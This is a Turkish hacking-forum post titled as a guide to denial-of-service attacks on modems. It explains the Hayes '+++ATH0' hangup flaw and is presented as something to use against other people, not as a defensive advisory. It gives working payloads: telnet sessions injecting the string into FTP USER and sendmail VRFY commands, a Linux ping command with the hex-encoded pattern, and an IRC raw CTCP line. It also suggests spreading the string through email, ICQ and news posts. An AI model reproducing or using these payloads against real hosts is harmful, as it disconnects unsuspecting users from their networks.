|
|
|
|||||||
| Web-Domain Hacking Web-domain hack ile ilgili sorularınız,yöntemler. |
 | ||
 |
|
|
Seçenekler | Stil |
  Modemlere DoS Atak Yapmak !.. | ||||||||||
|
(#1)
|
|||||||||
|
[10]Yeni Üye
  
>Mesaj Sayısı: 185
>Açtığı Konu: 13
Level: 12 [  ]Paylaşım: 29 / 291
Üyelik tarihi: Jan 2008
Kullanıcı No: 219743
Rep Puani: 128
Rep Derecesi :
|
Modemlere DoS Atak Yapmak !.. -
07-03-2008
slm arkadaşlar
Piyasadaki bir cok modem Hayes Komut Seti (ATZ, ATDT, ATH0..) kullanirlar. Maalesef ki(?) bu tip modemler bazi ozel stringlerin işlenmesine de izin verirler. Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer. yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. iste hikayenin ozu bu. Bu attacktan tum modemler etkilenmez. Ornegin U.S. Robotics, 33.6 (+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez) Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir . PPP, IP datagramI default olarak sIkIstIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen okuyacagindan hat kesilme durumu gerceklesir  Tipik attack ornekleri: 1) 21 portuna telnet ile: elusive# telnet 199.99.99.99 21 Trying 199.99.99.99... Connected to 192.168.1.1. Escape character is '^]'. 220 abc FTP server (Version .............](1) Fri Apr 9 23:41: USER +++ATH0 ^] telnet> close Connection closed. elusive# telnet 192.168.1.1 21 Trying 199.99.99.99... telnet: Unable to connect to remote host: Network is unreachable elusive# 2) sendmaile telnet ile baglanın (qmail olunca olmuyor) ve "HELO orasi.com" yazın orasi neresiyse baglaninca welcome vs diycektir.. sonra: VRFY +++ATH0 sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu: 550 +++ATH0 3) ftp'ye baglanın. USER +++ATH0 kullanın.Diycektir ki: 331 Password required for +++ATH0 dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi). 4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli, ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0 yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p 5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz) (Ping modem killer ilk defa MrPhoenix (phoenix@iname.com) tarafindan bahsedilmistir.) +++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter) #ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx PATTERN: 0x2b2b2b415448300d PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes --- xxx.xxx.xxx.xxx ping statistics --- 5 packets transmitted, 0 packets received, 100% packet loss 5 paket gitti..1-2 paket bazan yetmiyor(nedense??). cali$madIgI durum: # ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx PATTERN: 0x2b2b2b415448300d PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms --- xxx.xxx.xxx.xxx ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 180.1/186.5/190.1 ms peki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar. degilse..maili alan kisi alirken problem yasar. ICQ Mesajın içine aynı komutu yazın. Karşı makine büyük olasılıkla hattan düşecektir. Bu komutun yazı ile de olsa yazılı olduğu bir htm dosyasını upload etmeye çalışın %90 bağlantınız kopacak. News serverda deneyin (Bunu denemedim) News servera bu komut içeren bir mesaj atın. Mesajı okumak isteyenler düşecektir. IRC icin bir rivayete gore karsI tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar.. Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde: //raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1) yukarida satirda hic bir imla ya da yazim hatasI yoktur!. (bas taraftaki iki tane slash da dahiL!) |
|||||||||
|
||||||||||
 | ||||||||||
|
|
|
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Seçenekler | |
| Stil | |
|
|
Normal
